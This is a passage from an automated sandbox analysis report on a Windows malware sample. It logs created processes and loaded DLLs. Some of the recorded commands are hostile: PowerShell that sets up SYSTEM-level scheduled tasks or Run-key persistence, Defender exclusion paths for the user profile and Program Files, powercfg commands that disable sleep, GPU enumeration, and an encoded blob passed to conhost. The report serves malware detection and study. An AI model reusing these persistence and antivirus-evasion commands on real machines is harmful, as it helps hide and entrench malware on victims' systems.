                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }Jump to behavior
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydxtfs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GQFENPEL" } Else { "C:\Program Files\xjfgcnhmcvxy.exe" }Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GQFENPELJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }Jump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe xcgkmjxjdowqJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"Jump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe gzssianthtxzdggz 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvug8Rp3hiani4Twfqfj5pfOQ4C5/lIR+WrKX/39lFBfrYgVA5xlELaQrgfEYI/1+l+sm6d1wY+jp8lQ+gyInBZtRryf27JkgwVg8+gc8zt/+Qw/FqR21gXGsiWp5M1/PaUO8B8L/yFa9vhQOOMQzU9osOZwr+lVWCnvU0S6ajO3l3PA+IO3tZ+KIHzg9oJDykmRT9FPoLVpg3f2E+S/d4wYAneGaTBaw9u+h7ySSQW4uLa2RdrQlsNvaothGQq4OkU9/7weTT4gwdlFYcJqzkf6CrPgHCU2Z2X/1LqnGA0Z/oGM3RQZ3KFMH6aI6u72Mx/Roo9xz5ogo8pI2aMP1z57eBCyYbXyiGT0rCG540iwNf53KRDw5r+qu9TX7DnABrUnuCbtJtyaOErrfhHdH0mzc3oHhwbzk+xXdFEnj5LezfN80ibSpckaUWKu/Nc8n5n3862TFcZoV3+5pG7wnvACa9eswJk6IY7ANEpRFN9HJzRPurRT3aTK7NgnMwc4gmU=Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic PATH Win32_VideoController GET Name, VideoProcessor
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
